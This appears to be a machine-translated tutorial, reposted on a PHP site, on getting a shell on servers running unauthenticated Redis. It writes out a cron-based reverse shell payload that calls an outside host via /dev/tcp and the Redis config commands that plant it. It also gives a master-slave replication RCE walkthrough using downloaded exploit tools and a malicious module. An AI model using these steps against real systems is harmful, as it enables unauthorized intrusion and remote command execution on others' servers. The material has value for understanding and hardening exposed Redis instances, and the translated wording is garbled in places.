Example analysis of Redis+Getshell

Foreword:

Normally, when conducting authorization penetration testing, even if traditional vulnerability attacks (such as injection, file upload, etc.) are tried, no information can be obtained. Scanning ports may still bring unexpected gains.

Knowing oneself and knowing the enemy is the best way to win a hundred battles. Redis introduction:

Simply speaking, redis is a Key-Value type database. All data in redis are operated in memory, and it Data in memory can be stored on disk periodically, and supports saving a variety of data structures (String, hash, list, etc.).

In the midst of strategizing, Redis vulnerabilities:

1. Unauthorized access vulnerability

Redis By default, it will be bound to 0.0.0.0:6379. If IP access is not restricted, the Redis service will be exposed to the public network, and if password authentication is not set, any user will not be authorized to access Redis. As well as reading Redis data and writing public keys for remote connection, etc.

We will not be satisfied when we get the database permissions. Our goal is only getshell!

There are currently two more mainstream methods, the first is to schedule a rebound shell regularly, and the second is to use master-slave replication rce.

2. Scheduled rebound shell

1) set x "\n* * * * * bash -i >& /dev/tcp/ 1.1.1.1/888 0>&1\n"

2) config set dir /var/spool/cron/

3) config set dbfilename root

4) save

3. Using master-slave replication rce

The vulnerability exists in versions 4.x and 5.x. Redis provides a master-slave mode. The mode refers to using one redis as the host and the other as the backup machine. The host and slave data are the same. The slave is only responsible for reading, and the master is only responsible for writing. After Reids 4.x, through external expansion, it is possible to implement a new Redis command in redis and construct a malicious .so file. When two Redis instances are set in master-slave mode, the Redis host instance can synchronize files to the slave machine through FULLRESYNC. Then load the malicious so file on the slave machine to execute the command.

You need to use a tool, just download it from GitHub.

1) git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand (requires make)

2) git clone https://github.com/Ridter/ redis-rce.git

Then connect to redis through unauthorized access or weak password, and execute the script to obtain the shell.

Decisive victory thousands of miles away, actual combat drill:

This time I scanned 6379, which is Redis. Sometimes the default port may be changed. It is recommended to scan the whole port. This time, the master-slave copy rce is used to obtain the shell (since the vulnerability has been submitted to src and a confidentiality agreement has been signed, a target machine is built to restore the real environment to ensure the authenticity.)

attack End IP: 192.168.109.134

Server IP: 192.168.109.136

Connect to redis through unauthorized access (if you have a password, you can try to blast and log in to the system with authpassword) ：Redis-cli –h ip
Use master-slave copy rce to obtain shell

First, generate a malicious .so file, download RedisModules-ExecuteCommand and use make to compile it.
Attack end execution:

python redis-rce.py -r target ip -p target port -L local ip -f malicious.so

successfully obtain shell

The above is the detailed content of Example analysis of Redis+Getshell. For more information, please follow other related articles on the PHP Chinese website!